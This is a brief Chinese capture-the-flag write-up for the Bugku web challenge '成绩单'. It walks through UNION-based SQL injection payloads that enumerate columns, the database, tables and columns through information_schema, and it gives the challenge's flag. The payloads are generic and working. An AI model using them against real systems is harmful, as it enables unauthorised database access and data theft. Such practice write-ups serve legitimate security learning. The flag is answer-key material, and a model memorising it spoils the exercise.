Bugku web 成绩单

本题直接在页面中的查询栏输入:

1' order by 4# (求出列数4列)

1' and 1=2 union select 1,2,3,4# (求显示位)

1'and 1=2 union select 1,2,database(),4# (求出数据库skctf_flag)

1'and 1=2 union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema='skctf_flag'# (求出表名为fl4g,sc)(注意这是两个表)

1'and 1=2 union select 1,2,3,group_concat(column_name)from information_schema.columns where table_schema='skctf_flag' and table_name = 'fl4g'# (求出列名为skctf_flag)

1'and 1=2 union select 1,2,3,group_concat(skctf_flag) from fl4g#  (求字段内容为BUGKU{Sql_INJECT0N_4813drd8hz4})(结束)

你可能感兴趣的:(CTF)